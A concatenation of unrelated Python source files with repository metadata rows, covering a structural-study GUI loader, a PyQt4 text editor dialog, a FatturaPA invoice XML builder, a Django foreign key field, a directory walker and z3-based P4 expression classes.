        # There is already a name for this value in the DB, use it.
        return str(by_value[value])
    # Otherwise find an unused name and store the value under it.
    candidate = key
    suffix = 1
    while candidate in existing:
        candidate = '{0}_{1:04d}'.format(key, suffix)
        suffix += 1
    save(which, candidate, value)
    return candidate
def reconstruct_params_from_gui(std):
    """Rebuild ``std.params_from_gui`` from the study's ConeCyl objects.

    Used for studies that were saved without GUI parameters: the settings
    are reverse-engineered from the last ConeCyl (perturbation loads, PPI,
    FFI, MSI/TI imperfections, laminate table) so the GUI form can be
    repopulated. The result is stored on ``std.params_from_gui``.
    """
    # First cc is often a linear one, so use the last cc as 'template'
    # XX - it is assumed that all other ccs use the same parameters
    cc = std.ccs[-1]
    params = {}
    for attr in ccattrs:
        if attr in ('laminapropKeys', 'allowables', 'stack', 'plyts',
                    'damping_factor1', 'damping_factor2'):
            continue
        value = getattr(cc, attr)
        params[attr] = value
    # Set artificial_dampingX and damping_factorX manually
    damping_attrs = [('damping_factor1', 'artificial_damping1'),
                     ('damping_factor2', 'artificial_damping2')]
    for damp_attr, art_attr in damping_attrs:
        value = getattr(cc, damp_attr)
        params[damp_attr] = value if (value is not None) else 0.
        params[art_attr] = value is not None
    # Prevent the GUI from complaining about unset parameters
    for attr in ('axial_load', 'axial_displ', 'pressure_load'):
        if params[attr] is None:
            params[attr] = 0
    # Set laminate properties
    if not (len(cc.laminaprops) == len(cc.stack) == len(cc.plyts) ==
            len(cc.laminapropKeys)):
        raise ValueError('Loaded ConeCyl object has inconsistent stack length!')
    laminapropKeys = []
    for key, value in zip(cc.laminapropKeys, cc.laminaprops):
        laminapropKeys.append(get_new_key('laminaprops', key, value))
    params['laminapropKey'] = laminapropKeys[0]
    # allowableKey is not saved, so reuse laminapropKey for the name
    # TODO: Per-ply allowables
    params['allowablesKey'] = get_new_key('allowables',
        cc.laminapropKeys[0], cc.allowables[0])
    # Construct laminate table
    # import here to avoid circular reference
    from testDB import NUM_PLIES, MAX_MODELS
    # The GUI stores tables as comma-joined '(a,b,c)' rows of fixed-width
    # byte strings; empty cells stay ''.
    tmp = np.empty((NUM_PLIES, 3), dtype='|S50')
    tmp.fill('')
    tmp[:len(laminapropKeys),0] = laminapropKeys
    tmp[:len(cc.plyts),1] = cc.plyts
    tmp[:len(cc.stack),2] = cc.stack
    params['laminate'] = ','.join(['('+','.join(i)+')' for i in tmp])
    # Apply perturbation loads
    # TODO: other imperfections
    all_ploads = list(chain.from_iterable(cci.impconf.ploads for cci in std.ccs))
    all_ploads = map(lambda pl: (pl.thetadeg, pl.pt), all_ploads)
    # Filter duplicates, to obtain a list of unique pload parameter combinations
    seen = set()
    all_ploads = [x for x in all_ploads if not (x in seen or seen.add(x))]
    params['pl_num'] = len(all_ploads)
    # NOTE: map/filter returning lists is Python-2 behavior that the code
    # below (len, .index) depends on.
    nonlinear_ccs = filter(lambda cci: not cci.linear_buckling, std.ccs)
    # TODO: unduplicate magic numbers (here, in create_study and in testDB)
    # It'll only get worse when adding other imperfections as well
    if params['pl_num'] > 32:
        raise ValueError('Too many different perturbation load parameters')
    if len(nonlinear_ccs) > MAX_MODELS:
        raise ValueError('Too many different models')
    # Rows 0/1 hold theta/pt; per-model amplitude rows start at index 3,
    # matching the table layout consumed by create_study.
    tmp = np.empty((len(nonlinear_ccs) + 3, 32), dtype='|S50')
    tmp.fill('')
    tmp[0,:len(all_ploads)] = [thetadeg for thetadeg, pt in all_ploads]
    tmp[1,:len(all_ploads)] = [pt for thetadeg, pt in all_ploads]
    for row, cci in enumerate(nonlinear_ccs, start=3):
        for pl in cci.impconf.ploads:
            assert (pl.thetadeg, pl.pt) in all_ploads
            tmp[row,all_ploads.index((pl.thetadeg, pl.pt))] = pl.pltotal
    params['pl_table'] = ','.join(['('+','.join(i)+')' for i in tmp])
    # Apply PPI
    ppi = cc.impconf.ppi
    if ppi is not None:
        params['ppi_enabled'] = True
        params['ppi_extra_height'] = ppi.extra_height
        tmp = np.empty((len(ppi.info), 4), dtype='|S50')
        keys = ['starting_position', 'rel_ang_offset', 'max_width', 'eccentricity']
        for i, info_dict in enumerate(ppi.info):
            tmp[i,:] = [str(info_dict.get(key, '')) for key in keys]
        params['ppi_table'] = ','.join(['('+','.join(i)+')' for i in tmp])
    else:
        params['ppi_table'] = ''
    # Apply FFI
    ffi = cc.impconf.ffi
    if ffi is not None:
        params['ffi_nominal_vf'] = ffi.nominal_vf
        params['ffi_E_matrix'] = ffi.E_matrix
        params['ffi_nu_matrix'] = ffi.nu_matrix
        ffi_scalings = []
        for cci in nonlinear_ccs:
            ffi = cci.impconf.ffi
            if ffi is None:
                ffi_scalings.append((0, False))
            else:
                sf = ffi.global_sf if ffi.global_sf is not None else 0
                ffi_scalings.append((sf, ffi.use_ti))
        params['ffi_scalings'] = ','.join(str(s) for s in ffi_scalings)
    else:
        params['ffi_scalings'] = ''
    # MSI, TI
    for imp_type in ('ms', 't'):
        imps = getattr(cc.impconf, imp_type + 'is')
        if len(imps) == 0:
            params['imp_{0}_scalings'.format(imp_type)] = ''
            continue
        imp = imps[0]
        params['imp_{0}_theta_z_format'.format(imp_type)] = imp.use_theta_z_format
        params['imp_{0}_stretch_H'.format(imp_type)] = imp.stretch_H
        params['imp_{0}_ncp'.format(imp_type)] = imp.ncp
        params['imp_{0}_power_parameter'.format(imp_type)] = imp.power_parameter
        # rotatedeg seems not yet implemented in GUI ?!
        # params['imp_{0}_rotatedeg'.format(imp_type)] = imp.rotatedeg
        name_attr = 'imp_ms' if imp_type == 'ms' else 'imp_thick'
        params[name_attr] = getattr(imp, name_attr)
        if imp_type == 'ms':
            params['imp_r_TOL'] = imp.r_TOL
        else:
            params['imp_num_sets'] = imp.number_of_sets
        # If there are multiple TIs / MSIs, we are out of luck
        scalings = []
        for cci in nonlinear_ccs:
            cci_imps = getattr(cci.impconf, imp_type + 'is')
            def filter_imps(impi):
                return getattr(impi, name_attr) == getattr(imp, name_attr)
            cci_imps = filter(filter_imps, cci_imps)
            scalings.append(0 if len(cci_imps) == 0 else cci_imps[0].scaling_factor)
        scalings = ','.join(str(s) for s in scalings)
        params['imp_{0}_scalings'.format(imp_type)] = scalings
    params['std_name'] = std.name
    std.params_from_gui = params
def load_study_gui(std_name, form):
    """Load a saved study and populate the GUI *form* with its parameters.

    Returns True when the study was saved with GUI parameters, False when
    they had to be reconstructed from the study's ConeCyl objects.
    """
    loader = study.Study()
    loader.tmp_dir = TMP_DIR
    loader.name = std_name
    std = loader.load()
    saved_from_gui = bool(std.params_from_gui)
    if not saved_from_gui:
        # Older studies were saved without GUI parameters; rebuild them.
        reconstruct_params_from_gui(std)
    form.setDefault()
    form.read_params_from_gui(std.params_from_gui)
    return saved_from_gui
| 36.96796 | 125 | 0.593194 | 0 | 0 | 0 | 0 | 2,397 | 0.109342 | 0 | 0 | 4,981 | 0.227215 |
d3230aebfb6ec10341841fb4d94700228d875338 | 2,277 | py | Python | pydeelib/widgets/texteditor.py | pombreda/pydee | 133609d4e378361d968e7a06baa11256e0e2f403 | [
"MIT"
] | null | null | null | pydeelib/widgets/texteditor.py | pombreda/pydee | 133609d4e378361d968e7a06baa11256e0e2f403 | [
"MIT"
] | null | null | null | pydeelib/widgets/texteditor.py | pombreda/pydee | 133609d4e378361d968e7a06baa11256e0e2f403 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Copyright © 2009 Pierre Raybaut
# Licensed under the terms of the MIT License
# (see pydeelib/__init__.py for details)
"""
Text Editor Dialog based on PyQt4
"""
# pylint: disable-msg=C0103
# pylint: disable-msg=R0903
# pylint: disable-msg=R0911
# pylint: disable-msg=R0201
from PyQt4.QtCore import Qt
from PyQt4.QtCore import SIGNAL, SLOT
from PyQt4.QtGui import QVBoxLayout, QTextEdit, QDialog, QDialogButtonBox
# Local import
from pydeelib.config import get_icon, get_font
class TextEditor(QDialog):
    """Text Editor Dialog.

    Modal dialog showing *text* in a plain-text edit widget with OK/Cancel
    buttons; the (possibly modified) contents can be read back through
    :meth:`get_copy` after the dialog is accepted.
    (The original docstring said "Array Editor Dialog", a copy-paste slip.)
    """
    def __init__(self, text, title='', font=None, parent=None):
        # text: initial contents of the editor
        # title: appended to the window title when non-empty
        # font: editor font; falls back to the configured 'texteditor' font
        super(TextEditor, self).__init__(parent)
        self.layout = QVBoxLayout()
        self.setLayout(self.layout)
        # Text edit
        self.edit = QTextEdit(parent)
        self.edit.setPlainText(text)
        if font is None:
            font = get_font('texteditor')
        self.edit.setFont(font)
        self.layout.addWidget(self.edit)
        # Buttons configuration
        bbox = QDialogButtonBox(QDialogButtonBox.Ok | QDialogButtonBox.Cancel )
        self.connect(bbox, SIGNAL("accepted()"), SLOT("accept()"))
        self.connect(bbox, SIGNAL("rejected()"), SLOT("reject()"))
        self.layout.addWidget(bbox)
        # Make the dialog act as a window
        self.setWindowFlags(Qt.Window)
        self.setWindowIcon(get_icon('edit.png'))
        self.setWindowTitle(self.tr("Text editor") + \
                            "%s" % (" - "+str(title) if str(title) else ""))
        self.resize(400, 300)
    def get_copy(self):
        """Return the (possibly modified) editor text as unicode."""
        return unicode(self.edit.toPlainText())
def main():
    """Text editor demo: open the dialog, then reopen it with the result."""
    from PyQt4.QtGui import QApplication
    # NOTE(review): the QApplication instance is not bound to a name;
    # confirm that PyQt keeps the application singleton alive internally
    # before relying on this.
    QApplication([])
    dialog = TextEditor("""
01234567890123456789012345678901234567890123456789012345678901234567890123456789
dedekdh elkd ezd ekjd lekdj elkdfjelfjk e
""")
    if dialog.exec_():
        text = dialog.get_copy()
        print "Accepted:", text
        # Reopen the editor with the accepted text to show round-tripping.
        dialog = TextEditor(text)
        dialog.exec_()
    else:
        print "Canceled"
if __name__ == "__main__":
    main()
d32563b73d3b9a87be6655f27c6f26fcf020fa7f | 5,553 | py | Python | invoices/xml/__init__.py | pythonitalia/fatturae | 29e680ca942f60fcd92cff8e9651ee89bf832732 | [
"MIT"
] | 11 | 2018-12-28T12:13:21.000Z | 2021-01-19T15:33:47.000Z | invoices/xml/__init__.py | pythonitalia/fatturae | 29e680ca942f60fcd92cff8e9651ee89bf832732 | [
"MIT"
] | 8 | 2019-07-03T21:07:18.000Z | 2021-12-13T19:59:13.000Z | invoices/xml/__init__.py | pythonitalia/fatturae | 29e680ca942f60fcd92cff8e9651ee89bf832732 | [
"MIT"
] | 6 | 2019-01-01T23:56:41.000Z | 2021-09-21T06:54:53.000Z | from __future__ import annotations
from typing import TYPE_CHECKING, List
from lxml import etree
from .types import ProductSummary, XMLDict
from .utils import dict_to_xml, format_price
if TYPE_CHECKING:
from invoices.models import Invoice, Sender, Address
# XML namespace prefixes used when serializing the FatturaPA electronic
# invoice ("p" is the FatturaPA v1.2 schema namespace).
NAMESPACE_MAP = {
    "p": "http://ivaservizi.agenziaentrate.gov.it/docs/xsd/fatture/v1.2",
    "ds": "http://www.w3.org/2000/09/xmldsig#",
    "xsi": "http://www.w3.org/2001/XMLSchema-instance",
}
# Value for the xsi:schemaLocation attribute on the root element:
# "<namespace URI> <XSD location>" as a single space-separated string.
SCHEMA_LOCATION = (
    "http://ivaservizi.agenziaentrate.gov.it/docs/xsd/fatture/v1.2 "
    "http://www.fatturapa.gov.it/export/fatturazione/sdi/fatturapa/v1.2"
    "/Schema_del_file_xml_FatturaPA_versione_1.2.xsd"
)
def _get_recipient_code(invoice: Invoice) -> str:
if not invoice.recipient_code:
return "0000000"
return invoice.recipient_code
def _generate_header(invoice: Invoice) -> XMLDict:
    """Build the FatturaElettronicaHeader section as nested dicts.

    The keys mirror the FatturaPA XML element names; the dict is later
    converted to XML elements by ``dict_to_xml``.
    """
    sender: Sender = invoice.sender
    sender_address: Address = sender.address
    recipient_address: Address = invoice.recipient_address
    # Transmission metadata (who sends the file and to which SDI code).
    transmission = {
        "IdTrasmittente": {
            "IdPaese": sender.country_code,
            "IdCodice": sender.code,
        },
        "ProgressivoInvio": 1,
        "FormatoTrasmissione": invoice.transmission_format,
        "CodiceDestinatario": _get_recipient_code(invoice),
        "PecDestinatario": invoice.recipient_pec,
    }
    # Supplier (CedentePrestatore) identification and registered address.
    supplier = {
        "DatiAnagrafici": {
            "IdFiscaleIVA": {
                "IdPaese": sender.country_code,
                "IdCodice": sender.code,
            },
            "Anagrafica": {"Denominazione": sender.company_name},
            "RegimeFiscale": sender.tax_regime,
        },
        "Sede": {
            "Indirizzo": sender_address.address,
            "CAP": sender_address.postcode,
            "Comune": sender_address.city,
            "Provincia": sender_address.province,
            "Nazione": sender_address.country_code,
        },
    }
    # Customer (CessionarioCommittente) identification and address.
    customer = {
        "DatiAnagrafici": {
            # TODO: add fiscal code if no recipient_tax_code
            "IdFiscaleIVA": {
                "IdPaese": sender.country_code,
                "IdCodice": invoice.recipient_tax_code,
            },
            "Anagrafica": {
                "Denominazione": invoice.recipient_denomination,
                "Nome": invoice.recipient_first_name,
                "Cognome": invoice.recipient_last_name,
            },
        },
        "Sede": {
            "Indirizzo": recipient_address.address,
            "CAP": recipient_address.postcode,
            "Comune": recipient_address.city,
            "Provincia": recipient_address.province,
            "Nazione": recipient_address.country_code,
        },
    }
    return {
        "FatturaElettronicaHeader": {
            "DatiTrasmissione": transmission,
            "CedentePrestatore": supplier,
            "CessionarioCommittente": customer,
        }
    }
def _generate_body(invoice: Invoice) -> XMLDict:
    """Build the FatturaElettronicaBody section as nested dicts.

    Includes the general document data, one DettaglioLinee entry per
    product summary row, the VAT summary and the payment details. Keys
    mirror the FatturaPA XML element names.
    """
    summary: List[ProductSummary] = invoice.invoice_summary
    # One invoice line per summary row, with all monetary fields formatted.
    line_items = []
    for item in summary:
        line_items.append({
            "NumeroLinea": item["row"],
            "Descrizione": item["description"],
            "Quantita": format_price(item["quantity"]),
            "PrezzoUnitario": format_price(item["unit_price"]),
            "PrezzoTotale": format_price(item["total_price"]),
            "AliquotaIVA": format_price(item["vat_rate"]),
        })
    general_data = {
        "DatiGeneraliDocumento": {
            "TipoDocumento": invoice.invoice_type,
            "Divisa": invoice.invoice_currency,
            "Data": invoice.invoice_date.strftime("%Y-%m-%d"),
            "Numero": invoice.invoice_number,
            "Causale": invoice.causal,
        }
    }
    goods_and_services = {
        "DettaglioLinee": line_items,
        "DatiRiepilogo": {
            "AliquotaIVA": format_price(invoice.invoice_tax_rate),
            "ImponibileImporto": format_price(invoice.invoice_amount),
            "Imposta": format_price(
                invoice.invoice_tax_rate * invoice.invoice_amount / 100
            ),
        },
    }
    payment = {
        "CondizioniPagamento": invoice.payment_condition,
        "DettaglioPagamento": {
            "ModalitaPagamento": invoice.payment_method,
            "ImportoPagamento": format_price(invoice.invoice_amount),
        },
    }
    return {
        "FatturaElettronicaBody": {
            "DatiGenerali": general_data,
            "DatiBeniServizi": goods_and_services,
            "DatiPagamento": payment,
        }
    }
def invoice_to_xml(invoice: Invoice) -> etree._Element:
    """Serialize *invoice* into a FatturaPA ``<p:FatturaElettronica>`` element.

    Creates the namespaced root (version FPR12, with xsi:schemaLocation)
    and appends the header and body sections produced by the dict-based
    generators.
    """
    root_tag = "{{{0}}}FatturaElettronica".format(NAMESPACE_MAP["p"])
    schema_location_key = "{{{0}}}schemaLocation".format(NAMESPACE_MAP["xsi"])
    root = etree.Element(
        root_tag,
        attrib={schema_location_key: SCHEMA_LOCATION},
        nsmap=NAMESPACE_MAP,
        versione="FPR12",
    )
    # Header first, then body -- the order of the appended children matters.
    for section in (_generate_header(invoice), _generate_body(invoice)):
        for element in dict_to_xml(section):
            root.append(element)
    return root
| 34.277778 | 79 | 0.52134 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,372 | 0.247074 |
d3256dbf7b293bf8be691bd30c05059ca559be89 | 685 | py | Python | src/sentry/db/models/fields/foreignkey.py | withrocks/commonlims | d8a925c917aa26e8205fefb3966a9f49f8f2e2f8 | [
"BSD-3-Clause"
] | 4 | 2019-05-27T13:55:07.000Z | 2021-03-30T07:05:09.000Z | src/sentry/db/models/fields/foreignkey.py | withrocks/commonlims | d8a925c917aa26e8205fefb3966a9f49f8f2e2f8 | [
"BSD-3-Clause"
] | 99 | 2019-05-20T14:16:33.000Z | 2021-01-19T09:25:15.000Z | src/sentry/db/models/fields/foreignkey.py | withrocks/commonlims | d8a925c917aa26e8205fefb3966a9f49f8f2e2f8 | [
"BSD-3-Clause"
] | 1 | 2020-08-10T07:55:40.000Z | 2020-08-10T07:55:40.000Z | """
sentry.db.models.fields.foreignkey
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2014 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import
from django.db.models import ForeignKey
__all__ = ('FlexibleForeignKey', )
class FlexibleForeignKey(ForeignKey):
    """ForeignKey that asks the target field for its related column type.

    This is required to support BigAutoField (or anything similar) whose
    referencing column must use a wider db type than the default.
    """
    def db_type(self, connection):
        # Defer to Django's stock behavior unless the target field exposes
        # a custom related db type (e.g. BigAutoField -> bigint).
        rel_field = self.target_field
        if not hasattr(rel_field, 'get_related_db_type'):
            return super(FlexibleForeignKey, self).db_type(connection)
        return rel_field.get_related_db_type(connection)
| 29.782609 | 75 | 0.70073 | 365 | 0.532847 | 0 | 0 | 0 | 0 | 0 | 0 | 304 | 0.443796 |
d32a4aebc5975eb5e4c7cdb76bcd29f0483434fb | 3,235 | py | Python | pybond/bond/bond_helpers/observe_files.py | necula01/bond | 7ac262bc9695ba493985c784999509dec979e37a | [
"BSD-2-Clause-FreeBSD"
] | 8 | 2015-11-19T01:14:08.000Z | 2017-06-16T11:21:16.000Z | pybond/bond/bond_helpers/observe_files.py | gnecula/bond | 7ac262bc9695ba493985c784999509dec979e37a | [
"BSD-2-Clause-FreeBSD"
] | 26 | 2015-10-12T21:31:13.000Z | 2017-04-11T13:57:33.000Z | pybond/bond/bond_helpers/observe_files.py | gnecula/bond | 7ac262bc9695ba493985c784999509dec979e37a | [
"BSD-2-Clause-FreeBSD"
] | 3 | 2015-10-30T01:12:10.000Z | 2016-03-26T16:58:17.000Z | # Helper functions to observe files and directories
import os
import re
def collect_directory_contents(directory,
                               file_filter=None,
                               collect_file_contents=False):
    """
    Collect a nested dict reflecting the contents of a directory tree.

    :param directory: the directory where to start the traversal
    :param file_filter: either a string holding a regular expression matched
        (via re.match) against each file/directory path relative to
        ``directory``, or a callable taking that relative path and returning
        a truthy value when the entry should be included.
    :param collect_file_contents: indicates whether to collect file contents.
        True collects contents of all included files; a string is treated as
        a regular expression selecting which relative paths to read; a
        callable is invoked with the relative path.
    :return: a dictionary keyed by basename. Sub-directories map to nested
        dictionaries. Files map to a list of right-stripped lines when their
        contents are collected, otherwise to None.
    """
    # Fix: the original tested isinstance(..., basestring), which is
    # Python-2-only and raises NameError under Python 3; use str instead.
    result = {}

    # Normalize file_filter into a predicate over the relative path.
    file_filter_func = None
    if file_filter:
        if isinstance(file_filter, str):
            file_filter_regexp = re.compile(file_filter)
            file_filter_func = file_filter_regexp.match
        elif callable(file_filter):
            file_filter_func = file_filter
        else:
            raise TypeError(
                "file_filter must be a regex string or a callable")

    # Normalize collect_file_contents into a predicate as well.
    collect_file_contents_func = None
    if collect_file_contents:
        if isinstance(collect_file_contents, bool):
            collect_file_contents_func = lambda rel_file: True
        elif isinstance(collect_file_contents, str):
            include_contents_regexp = re.compile(collect_file_contents)
            collect_file_contents_func = include_contents_regexp.match
        elif callable(collect_file_contents):
            collect_file_contents_func = collect_file_contents
        else:
            raise TypeError(
                "collect_file_contents must be a bool, regex string, "
                "or a callable")

    def recurse(rel_subdir, result_data):
        # Walk one directory level, filling result_data in place.
        name_subdir = os.path.join(directory, rel_subdir)
        for basename in os.listdir(name_subdir):
            rel_file = os.path.join(rel_subdir, basename)
            file_path = os.path.join(directory, rel_file)
            if file_filter_func and not file_filter_func(rel_file):
                continue
            if os.path.isdir(file_path):
                subresult_data = {}
                result_data[basename] = subresult_data
                recurse(rel_file, subresult_data)
            elif collect_file_contents_func and collect_file_contents_func(rel_file):
                # use a context manager so the handle is always closed
                with open(file_path, 'r') as f:
                    result_data[basename] = [l.rstrip() for l in f.readlines()]
            else:
                result_data[basename] = None

    recurse('', result)
    return result
| 44.930556 | 102 | 0.646677 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,205 | 0.372488 |
d32aedc406d3ed96b03df496926ed0bbfe5758f8 | 18,611 | py | Python | p4z3/expressions.py | gauntlet-repo/gauntlet | be847507556fc61d85e0bfd70ac57b5d064c9e8a | [
"Apache-2.0"
] | 2 | 2020-08-16T02:23:19.000Z | 2021-01-04T16:01:35.000Z | p4z3/expressions.py | gauntlet-repo/gauntlet | be847507556fc61d85e0bfd70ac57b5d064c9e8a | [
"Apache-2.0"
] | null | null | null | p4z3/expressions.py | gauntlet-repo/gauntlet | be847507556fc61d85e0bfd70ac57b5d064c9e8a | [
"Apache-2.0"
] | null | null | null | import operator as op
from p4z3.base import log, z3_cast, z3, copy_attrs, copy, gen_instance
from p4z3.base import P4ComplexInstance, P4Expression, P4ComplexType
class P4Initializer(P4Expression):
    """Wraps an initializer value, optionally coercing it to a target type.

    With no instance_type, evaluation just resolves and returns the value.
    Otherwise a fresh instance of instance_type is generated and populated
    from the value (dict of members, positional list, or scalar cast).
    """
    def __init__(self, val, instance_type=None):
        # val: the raw initializer expression; instance_type: optional
        # target type to instantiate and fill.
        self.val = val
        self.instance_type = instance_type
    def eval(self, p4_state):
        """Resolve the initializer against p4_state and return the result."""
        val = p4_state.resolve_expr(self.val)
        if self.instance_type is None:
            # no type defined, return just the value
            return val
        else:
            instance = gen_instance("None", self.instance_type)
            if isinstance(val, P4ComplexInstance):
                # copy the reference if we initialize with another complex type
                return copy.copy(val)
            if isinstance(instance, P4ComplexInstance):
                if isinstance(val, dict):
                    # keyed initializer: set each named member
                    # (note: the loop variable intentionally shadows val)
                    instance.setValid()
                    for name, val in val.items():
                        val_expr = p4_state.resolve_expr(val)
                        instance.set_or_add_var(name, val_expr)
                elif isinstance(val, list):
                    # positional initializer
                    instance.set_list(val)
                else:
                    raise RuntimeError(
                        f"P4StructInitializer members {val} not supported!")
                return instance
            else:
                # cast the value we assign to the instance we create
                # TODO: I do not like this, there must be a better way to do this
                if isinstance(val, int) and isinstance(instance, (z3.BitVecSortRef, z3.BitVecRef)):
                    val = z3_cast(val, instance.sort())
                return val
class P4Op(P4Expression):
    """Abstract base for unary/binary P4 operator expressions."""
    def get_value(self):
        """Fold the expression to a compile-time constant (subclass hook)."""
        raise NotImplementedError("get_value")
    def eval(self, p4_state):
        """Symbolically evaluate against a P4 state (subclass hook)."""
        raise NotImplementedError("eval")
class P4BinaryOp(P4Op):
    """Generic binary operator: resolves both operands, aligns bitvector
    widths (widening the narrower operand), then applies self.operator."""
    def __init__(self, lval, rval, operator):
        # operator is a two-argument callable (z3 builtin or python operator)
        self.lval = lval
        self.rval = rval
        self.operator = operator
    def get_value(self):
        """Constant-fold the subtree; only defined for pure int operands."""
        # TODO: This is a kind of hacky function to work around bitvectors
        # There must be a better way to implement this
        lval = self.lval
        rval = self.rval
        if isinstance(lval, P4Op):
            lval = lval.get_value()
        if isinstance(rval, P4Op):
            rval = rval.get_value()
        if isinstance(lval, int) and isinstance(rval, int):
            return self.operator(lval, rval)
        else:
            raise RuntimeError(
                f"Operations on {lval} or {rval} not supported!")
    def eval(self, p4_state):
        """Resolve both operands, equalize bitvec sizes, apply the operator."""
        lval_expr = p4_state.resolve_expr(self.lval)
        rval_expr = p4_state.resolve_expr(self.rval)
        # align the bitvectors to allow operations
        lval_is_bitvec = isinstance(lval_expr, (z3.BitVecRef, z3.BitVecNumRef))
        rval_is_bitvec = isinstance(rval_expr, (z3.BitVecRef, z3.BitVecNumRef))
        if lval_is_bitvec and rval_is_bitvec:
            if lval_expr.size() < rval_expr.size():
                rval_expr = z3_cast(rval_expr, lval_expr.size())
            if lval_expr.size() > rval_expr.size():
                lval_expr = z3_cast(lval_expr, rval_expr.size())
        return self.operator(lval_expr, rval_expr)
class P4UnaryOp(P4Op):
    """Generic unary operator: resolves the operand then applies
    self.operator (a one-argument callable)."""
    def __init__(self, val, operator):
        self.val = val
        self.operator = operator
    def get_value(self):
        """Constant-fold the subtree; only defined for an int operand."""
        val = self.val
        if isinstance(val, P4Op):
            val = val.get_value()
        if isinstance(val, int):
            return self.operator(val)
        else:
            raise RuntimeError(f"Operations on {val}not supported!")
    def eval(self, p4_state):
        """Resolve the operand against p4_state and apply the operator."""
        expr = p4_state.resolve_expr(self.val)
        return self.operator(expr)
class P4not(P4UnaryOp):
    """Boolean negation expression (!a)."""
    def __init__(self, val):
        # hand z3's Not directly to the unary-op machinery
        P4UnaryOp.__init__(self, val, z3.Not)
class P4abs(P4UnaryOp):
    """Absolute-value expression."""
    def __init__(self, val):
        P4UnaryOp.__init__(self, val, op.abs)
class P4inv(P4UnaryOp):
    """Bitwise complement expression (~a)."""
    def __init__(self, val):
        P4UnaryOp.__init__(self, val, op.inv)
class P4neg(P4UnaryOp):
    """Arithmetic negation expression (-a)."""
    def __init__(self, val):
        P4UnaryOp.__init__(self, val, op.neg)
class P4add(P4BinaryOp):
    """Addition expression (a + b)."""
    def __init__(self, lval, rval):
        P4BinaryOp.__init__(self, lval, rval, op.add)
class P4sub(P4BinaryOp):
    """Subtraction expression (a - b)."""
    def __init__(self, lval, rval):
        def sub_op(x, y):
            # z3 rejects a plain python int on the left-hand side of a
            # bitvector subtraction, so cast it to the rhs sort first
            if isinstance(x, int) and isinstance(y, z3.BitVecRef):
                x = z3_cast(x, y)
            return op.sub(x, y)
        P4BinaryOp.__init__(self, lval, rval, sub_op)
class P4addsat(P4BinaryOp):
    """Saturating addition: clamps to the bitvector maximum on overflow."""
    def __init__(self, lval, rval):
        def saturating_add(x, y):
            in_range = z3.And(z3.BVAddNoOverflow(x, y, False),
                              z3.BVAddNoUnderflow(x, y))
            # on overflow/underflow return the all-ones maximum value
            return z3.If(in_range, x + y, 2**x.size() - 1)
        P4BinaryOp.__init__(self, lval, rval, saturating_add)
class P4subsat(P4BinaryOp):
    """Saturating subtraction: clamps to zero on underflow."""
    def __init__(self, lval, rval):
        def saturating_sub(x, y):
            in_range = z3.And(z3.BVSubNoOverflow(x, y),
                              z3.BVSubNoUnderflow(x, y, False))
            # on overflow/underflow return zero
            return z3.If(in_range, x - y, 0)
        P4BinaryOp.__init__(self, lval, rval, saturating_sub)
class P4mul(P4BinaryOp):
    """Multiplication expression (a * b)."""
    def __init__(self, lval, rval):
        P4BinaryOp.__init__(self, lval, rval, op.mul)
class P4mod(P4BinaryOp):
    """Modulo expression; P4 only defines it for positive unsigned operands."""
    def __init__(self, lval, rval):
        def unsigned_mod(x, y):
            # z3.URem needs at least one bitvector operand, so pure-int
            # inputs fall back to python's % operator
            if isinstance(y, int) and isinstance(x, int):
                return op.mod(x, y)
            return z3.URem(x, y)
        P4BinaryOp.__init__(self, lval, rval, unsigned_mod)
class P4pow(P4BinaryOp):
    """Exponentiation expression (a ** b)."""
    def __init__(self, lval, rval):
        P4BinaryOp.__init__(self, lval, rval, op.pow)
class P4band(P4BinaryOp):
    """Bitwise AND expression (a & b)."""
    def __init__(self, lval, rval):
        def bitwise_and(x, y):
            # z3 int sorts must be cast to the partner's bitvec sort
            # before mixing — required because of z3's type rules
            if z3.is_int(x) and isinstance(y, z3.BitVecRef):
                x = z3_cast(x, y)
            if z3.is_int(y) and isinstance(x, z3.BitVecRef):
                y = z3_cast(y, x)
            return op.and_(x, y)
        P4BinaryOp.__init__(self, lval, rval, bitwise_and)
class P4bor(P4BinaryOp):
    """Bitwise OR expression (a | b)."""
    def __init__(self, lval, rval):
        def bitwise_or(x, y):
            # z3 int sorts must be cast to the partner's bitvec sort
            # before mixing — required because of z3's type rules
            if z3.is_int(x) and isinstance(y, z3.BitVecRef):
                x = z3_cast(x, y)
            if z3.is_int(y) and isinstance(x, z3.BitVecRef):
                y = z3_cast(y, x)
            return op.or_(x, y)
        P4BinaryOp.__init__(self, lval, rval, bitwise_or)
class P4land(P4BinaryOp):
    """Logical AND (a && b) with short-circuit side-effect semantics."""
    def __init__(self, lval, rval):
        operator = z3.And
        P4BinaryOp.__init__(self, lval, rval, operator)
    def eval(self, p4_state):
        """Evaluate both operands, but apply rhs side effects only under
        the lhs condition (modeling short-circuit evaluation)."""
        # boolean expressions can short-circuit
        # so we save the result of the right-hand expression and merge
        lval_expr = p4_state.resolve_expr(self.lval)
        # snapshot the state so rhs side effects can be rolled back
        var_store, chain_copy = p4_state.checkpoint()
        rval_expr = p4_state.resolve_expr(self.rval)
        # capture the post-rhs locals, then roll back to the snapshot
        else_vars = copy_attrs(p4_state.locals)
        p4_state.restore(var_store, chain_copy)
        # re-apply the rhs effects guarded by the lhs condition
        p4_state.merge_attrs(lval_expr, else_vars)
        return self.operator(lval_expr, rval_expr)
class P4lor(P4BinaryOp):
    """Logical OR (a || b) with short-circuit side-effect semantics."""
    def __init__(self, lval, rval):
        operator = z3.Or
        P4BinaryOp.__init__(self, lval, rval, operator)
    def eval(self, p4_state):
        """Evaluate both operands, but apply rhs side effects only when the
        lhs is false (modeling short-circuit evaluation of ||)."""
        # boolean expressions can short-circuit
        # so we save the result of the right-hand expression and merge
        lval_expr = p4_state.resolve_expr(self.lval)
        # snapshot the state so rhs side effects can be rolled back
        var_store, chain_copy = p4_state.checkpoint()
        rval_expr = p4_state.resolve_expr(self.rval)
        # capture the post-rhs locals, then roll back to the snapshot
        else_vars = copy_attrs(p4_state.locals)
        p4_state.restore(var_store, chain_copy)
        # re-apply the rhs effects guarded by Not(lhs) — rhs only runs
        # when the left operand is false
        p4_state.merge_attrs(z3.Not(lval_expr), else_vars)
